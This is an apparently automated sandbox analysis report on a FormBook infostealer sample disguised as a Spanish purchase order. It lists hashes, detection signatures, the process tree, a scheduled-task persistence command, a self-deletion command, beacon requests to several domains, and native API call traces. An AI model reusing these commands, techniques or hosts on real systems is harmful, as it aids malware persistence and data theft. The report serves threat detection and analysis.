Analysis Report Orden de compra.exe

Overview

General Information

Sample Name: Orden de compra.exe
Analysis ID: 299493
MD5: 3c6f98e28d6dd69ca0ec3d6cb5d7a4e6
SHA1: 2ab29cdb8b68bd66df7d2dd89f9332784a6756f7
SHA256: d30e5bd3a0ec9e64eea4363751655f0267d7ffb00a9552862179cd8cf6caa6c0
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Orden de compra.exe (PID: 6460 cmdline: 'C:\Users\user\Desktop\Orden de compra.exe' MD5: 3C6F98E28D6DD69CA0EC3D6CB5D7A4E6)
    • schtasks.exe (PID: 4876 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 3924 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 6792 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6788 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author
4.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.RegSvcs.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
4.2.RegSvcs.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
4.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.RegSvcs.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\Orden de compra.exe', ParentImage: C:\Users\user\Desktop\Orden de compra.exe, ParentProcessId: 6460, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp', ProcessId: 4876

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exe, ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: Orden de compra.exe, ReversingLabs: Detection: 16%
Yara detected FormBook
Source: Yara match, File source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Orden de compra.exe, Joe Sandbox ML: detected
Source: 4.2.RegSvcs.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: global traffic, HTTP traffic detected: GET /fs8/?FHOhxv=fb64Xt6PY4&Iv4=TMWo0d02AqsVcbzcQa4PfklrfocQn03XGfHcC1WSt61OgbB60peilv7yFPTA9yj5spVGq3aiuA== HTTP/1.1, Host: www.szysjfjx.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /fs8/?Iv4=ZsUpjtgdfmnFttmILyjTBY0y8wWuLtjFoZA0oAe87ERBVmsH8HUhhf6dhkcF9t1+Kkj5IXDYxA==&FHOhxv=fb64Xt6PY4 HTTP/1.1, Host: www.kumcal.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /fs8/?FHOhxv=fb64Xt6PY4&Iv4=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2PsdnytLljzoCFBvWZpEZlorh8CTmg== HTTP/1.1, Host: www.computercodecamp.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown, DNS traffic detected: queries for: www.szysjfjx.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Server: wts/1.6.4, Date: Fri, 16 Oct 2020 18:24:55 GMT, Content-Type: text/html; charset=iso-8859-1, Content-Length: 262, Connection: close, Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.szysjfjx.com Port 80</address></body></html>
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000002.593861267.000000000095C000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: wscript.exe, 00000008.00000002.595327159.000000000544F000.00000004.00000001.sdmp, String found in binary or memory: http://www.computercodecamp.com?FHOhxv=fb64Xt6PY4&Iv4=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2P
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000008.00000002.595327159.000000000544F000.00000004.00000001.sdmp, String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_0041A050 NtClose, 4_2_0041A050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_0041A100 NtAllocateVirtualMemory, 4_2_0041A100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00419F20 NtCreateFile, 4_2_00419F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00419FD0 NtReadFile, 4_2_00419FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_0041A04A NtClose, 4_2_0041A04A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_0041A01A NtReadFile, 4_2_0041A01A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_0041A0FA NtAllocateVirtualMemory, 4_2_0041A0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00419FCC NtReadFile, 4_2_00419FCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF98F0 NtReadVirtualMemory, LdrInitializeThunk, 4_2_00FF98F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9860 NtQuerySystemInformation, LdrInitializeThunk, 4_2_00FF9860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9840 NtDelayExecution, LdrInitializeThunk, 4_2_00FF9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF99A0 NtCreateSection, LdrInitializeThunk, 4_2_00FF99A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9910 NtAdjustPrivilegesToken, LdrInitializeThunk, 4_2_00FF9910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9A50 NtCreateFile, LdrInitializeThunk, 4_2_00FF9A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9A20 NtResumeThread, LdrInitializeThunk, 4_2_00FF9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9A00 NtProtectVirtualMemory, LdrInitializeThunk, 4_2_00FF9A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF95D0 NtClose, LdrInitializeThunk, 4_2_00FF95D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9540 NtReadFile, LdrInitializeThunk, 4_2_00FF9540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF96E0 NtFreeVirtualMemory, LdrInitializeThunk, 4_2_00FF96E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9660 NtAllocateVirtualMemory, LdrInitializeThunk, 4_2_00FF9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF97A0 NtUnmapViewOfSection, LdrInitializeThunk, 4_2_00FF97A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9780 NtMapViewOfSection, LdrInitializeThunk, 4_2_00FF9780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9710 NtQueryInformationToken, LdrInitializeThunk, 4_2_00FF9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF98A0 NtWriteVirtualMemory, 4_2_00FF98A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FFB040 NtSuspendThread, 4_2_00FFB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9820 NtEnumerateKey, 4_2_00FF9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF99D0 NtCreateProcessEx, 4_2_00FF99D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9950 NtQueueApcThread, 4_2_00FF9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9A80 NtOpenDirectoryObject, 4_2_00FF9A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9A10 NtQuerySection, 4_2_00FF9A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FFA3B0 NtGetContextThread, 4_2_00FFA3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9B00 NtSetValueKey, 4_2_00FF9B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF95F0 NtQueryInformationFile, 4_2_00FF95F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9560 NtWriteFile, 4_2_00FF9560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FFAD30 NtSetContextThread, 4_2_00FFAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9520 NtWaitForSingleObject, 4_2_00FF9520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF96D0 NtCreateKey, 4_2_00FF96D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9670 NtQueryInformationProcess, 4_2_00FF9670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9650 NtQueryValueKey, 4_2_00FF9650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9610 NtEnumerateValueKey, 4_2_00FF9610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9FE0 NtCreateMutant, 4_2_00FF9FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9770 NtSetInformationFile, 4_2_00FF9770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FFA770 NtOpenThread, 4_2_00FFA770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9760 NtOpenProcess, 4_2_00FF9760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FF9730 NtQueryVirtualMemory, 4_2_00FF9730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 4_2_00FFA710 NtOpenProcessToken, 4_2_00FFA710
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99860 NtQuerySystemInformation, LdrInitializeThunk, 8_2_04A99860
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99840 NtDelayExecution, LdrInitializeThunk, 8_2_04A99840
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A999A0 NtCreateSection, LdrInitializeThunk, 8_2_04A999A0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A995D0 NtClose, LdrInitializeThunk, 8_2_04A995D0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99910 NtAdjustPrivilegesToken, LdrInitializeThunk, 8_2_04A99910
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99540 NtReadFile, LdrInitializeThunk, 8_2_04A99540
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A996E0 NtFreeVirtualMemory, LdrInitializeThunk, 8_2_04A996E0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A996D0 NtCreateKey, LdrInitializeThunk, 8_2_04A996D0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99660 NtAllocateVirtualMemory, LdrInitializeThunk, 8_2_04A99660
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99A50 NtCreateFile, LdrInitializeThunk, 8_2_04A99A50
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99650 NtQueryValueKey, LdrInitializeThunk, 8_2_04A99650
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99780 NtMapViewOfSection, LdrInitializeThunk, 8_2_04A99780
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99FE0 NtCreateMutant, LdrInitializeThunk, 8_2_04A99FE0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99710 NtQueryInformationToken, LdrInitializeThunk, 8_2_04A99710
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A998A0 NtWriteVirtualMemory, 8_2_04A998A0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A998F0 NtReadVirtualMemory, 8_2_04A998F0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99820 NtEnumerateKey, 8_2_04A99820
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A9B040 NtSuspendThread, 8_2_04A9B040
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A995F0 NtQueryInformationFile, 8_2_04A995F0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A999D0 NtCreateProcessEx, 8_2_04A999D0
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A99520 NtWaitForSingleObject, 8_2_04A99520
Source: C:\Windows\SysWOW64\wscript.exe, Code function: 8_2_04A9AD30 NtSetContextThread, 8_2_04A9AD30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99560 NtWriteFile,8_2_04A99560
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99950 NtQueueApcThread,8_2_04A99950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A80 NtOpenDirectoryObject,8_2_04A99A80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A20 NtResumeThread,8_2_04A99A20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A00 NtProtectVirtualMemory,8_2_04A99A00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99610 NtEnumerateValueKey,8_2_04A99610
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99A10 NtQuerySection,8_2_04A99A10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99670 NtQueryInformationProcess,8_2_04A99670
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A997A0 NtUnmapViewOfSection,8_2_04A997A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9A3B0 NtGetContextThread,8_2_04A9A3B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99730 NtQueryVirtualMemory,8_2_04A99730
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99B00 NtSetValueKey,8_2_04A99B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9A710 NtOpenProcessToken,8_2_04A9A710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99760 NtOpenProcess,8_2_04A99760
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A99770 NtSetInformationFile,8_2_04A99770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9A770 NtOpenThread,8_2_04A9A770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA050 NtClose,8_2_005AA050
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005AA100 NtAllocateVirtualMemory,8_2_005AA100
